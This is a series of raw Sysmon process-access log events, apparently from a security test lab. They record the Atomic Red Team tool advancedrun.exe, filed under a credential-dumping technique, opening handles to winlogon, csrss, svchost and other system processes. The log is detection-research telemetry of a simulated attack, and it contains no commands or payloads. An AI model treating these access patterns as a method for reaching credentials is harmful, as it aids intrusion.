17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003943866Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943865Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943864Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943862Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943861Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943860Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943859Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943858Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943857Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943856Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943855Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943854Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943852Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.